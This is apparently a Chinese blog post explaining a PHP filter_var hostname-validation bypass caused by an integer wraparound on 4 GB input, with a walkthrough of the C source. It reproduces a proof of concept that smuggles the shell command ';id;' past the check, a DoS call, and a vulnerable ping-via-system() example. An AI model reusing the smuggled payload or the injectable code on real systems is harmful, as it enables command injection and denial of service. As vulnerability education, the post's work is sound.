前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >PHP filter_var 函数绕过

PHP filter_var 函数绕过

作者头像
h0cksr
发布2023-05-17 10:22:49
8310
发布2023-05-17 10:22:49
举报
文章被收录于专栏:h0cksr的小屋h0cksr的小屋

PHP filter_var 函数绕过

今天在日报看到了有关PHP函数绕过的文章就去学习了一下,但是有点尴尬的是文章是纯英文的直接翻译有很多地方会导致理解出问题,所以最后硬着头皮通过看原文学习, 所以这也可以说是一个简单的翻译文章吧, 原文见PHP filter_var shenanigans


关于filter_var函数

官方文档中的介绍:

大概就是可以使用php内置的一些过滤器对字符串进行检验, 起初我看官方文档和一些代码示例也还是挺懵的, 不过了解了第二个filter参数之后对这个函数的了解就简单很多了, 第二个参数就是指定一个内置的过滤器, 过滤器 ID 可以是 ID 名称(比如 FILTER_VALIDATE_EMAIL)或 ID 号(比如 274), 如果没设置的话默认使用字符串过滤器FILTER_SANITIZE_STRING。查看文档可以看到有以下过滤器:

filter中我们一般是使用Sanitize filters ,以下是一部分内容可供参考(见名知意了已经)

第三个参数options是一个可选项,用于规定一个包含标志/选项的关联数组或者一个单一的标志/选项。检查每个过滤器可能的标志和选项。


POC

在这里直接给出一个作者的POC吧:

代码语言:javascript
复制
<?php  

// normal usage  
var_dump(filter_var("example.com", FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME));  

// filter bypass  
var_dump(filter_var("5;id;" . str_repeat("a", 4294967286) . "a.com", FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME));  

// DoS/Memory corruption
var_dump(filter_var(str_repeat("a", 2294967286), FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME));  

?>

关于作者示例中的filter_var函数的参数我找了以下官方文档说明如下:

代码语言:javascript
复制
they must start with an alphanumeric character and contain only alphanumerics or hyphens

所以我们输入的字符串必须以字母数字字符开头,并且仅包含字母数字或连字符, 但是我们可以看到, 作者的POC当中包含了一个;字符但是会发现输出的结果为True, 这就是绕过的效果了。


原理探究

假设我们有以下代码,它将一些用户输入传递给 filter_var()并使用 FILTER_VALIDATE_DOMAIN或者 FILTER FLAG HOSTNAME。 这增加了根据每个主机原理验证主机名的功能(这意味着它们必须以字母数字字符开头,并且在整个长度中必须仅包含字母数字或连字符)。 成功完成此检查后,用户输入将在系统命令中使用(因此可能会引入命令注入漏洞)。 生成的代码将类似于以下内容。

代码语言:javascript
复制
<?php

userinput = "YOUR_USER_INPUT";command = "ping -c5 ";

if (filter_var(userinput, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME))
{
    system(command . userinput,retval);
}

?>

通常,在这种情况下不可能触发此命令注入。 因为我们用户的输入只能包含字母数字字符或连字符,所以在这种情况下是完全安全的。

通过底层代码详细检查它以了解 FILTER_VALIDATE_DOMAIN功能与 FILTER_FLAG_HOSTNAME

接下来看一下filter_var函数的工作源码:

代码语言:javascript
复制
void php_filter_validate_domain(PHP_INPUT_FILTER_PARAM_DECL) /* {{{ */
{
    if (!_php_filter_validate_domain(Z_STRVAL_P(value), Z_STRLEN_P(value), flags)) {
    RETURN_VALIDATION_FAILED
    }
}
/* }}} */

本质上,它所做的是获取指向我们的值的指针 userinput变量并将其作为第一个参数传递给 _php_filter_validate_domain,以及传递的输出 strlen(userinput)作为同一函数的第二个参数。 需要注意的是,函数 strlen()在这种情况下返回一个无符号整数。

现在让我们看一下函数签名 _php_filter_validate_domain

代码语言:javascript
复制
static int _php_filter_validate_domain(char * domain, int len, zend_long flags) /* {{{ */
{
    char *e, *s, *t;
    size_t l;
    int hostname = flags & FILTER_FLAG_HOSTNAME;
    unsigned char i = 1;

    s = domain;
    l = len; 
    e = domain + l;
    t = e - 1;

我们先要知道:

  1. size_t是无符号整数, size_t在32位系统上定义为 unsigned int,也就是32位无符号整型。在64位系统上定义为 unsigned long ,也就是64位无符号整形。
  2. int 类型在32和64位系统中均为32位4字节大小。

可以看到_php_filter_validate_domain函数参数lenint类型, 而下面的变量lsize_t类型, 在后面int类型的len被赋值给了size_t类型的l, 但是需要注意的是int是有符号整数, 表示范围为-21474836482147483648。

2^32=4294967296 , 所以我们使len=4294967296, 然后这个值被赋值给l, 最后会导致lenl均变为0。

代码语言:javascript
复制
    /* Ignore trailing dot */
    if (*t == '.') {
        e = t;
        l--;
    }

    /* The total length cannot exceed 253 characters (final dot not included) */
    if (l > 253) {
        return 0;
    }

这里有一段话可以参考原文理解, 意思是按照上面代码我们可以看到, 如果t的首字符是.那么就会对e执行赋值操作并且l–,

这会对后面的绕过造成困难,所以我们不这样做。然后下面的if判断因为l被赋值为0, 所以不会执行return。

代码语言:javascript
复制
    /* First char must be alphanumeric */
    if(*s == '.' || (hostname && !isalnum((int)*(unsigned char *)s))) {
        return 0;
    }

    while (s < e) {
        if (*s == '.') {
            /* The first and the last character of a label must be alphanumeric */
            if (*(s + 1) == '.' || (hostname && (!isalnum((int)*(unsigned char *)(s - 1)) || !isalnum((int)*(unsigned char *)(s + 1))))) {
                return 0;
            }

            /* Reset label length counter */
            i = 1;
        } else {
            if (i > 63 || (hostname && *s != '-' && !isalnum((int)*(unsigned char *)s))) {
                return 0;
            }

            i++;
        }

        s++;
    }

    return 1;
}

上面显示的代码是检查主机名是否仅包含字母数字字符或连字符(而不是其他字符)的实际代码。

正如我们所看到的,这仅在以下情况下才会进行检验: s小于 e

简单来说:如果使用 PHP 的 filter_var函数和传递给函数的值太长,和参数 l然后包装为零,将不执行检查。 这会导致主机名检查被完全绕过。

但是因为这个方法为了需要满足让字符串长度为4294967296(len = 4294967296 = 0 )需要的数据包必须刚好为4GB大小,这是大量数据,可能由于某些 Web 服务器和负载平衡器的配置而无法实现。

参考文章:

https://pwning.systems/posts/php_filter_var_shenanigans/

本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2022-3-30 1,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • PHP filter_var 函数绕过
  • 关于filter_var函数
  • POC
  • 原理探究
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档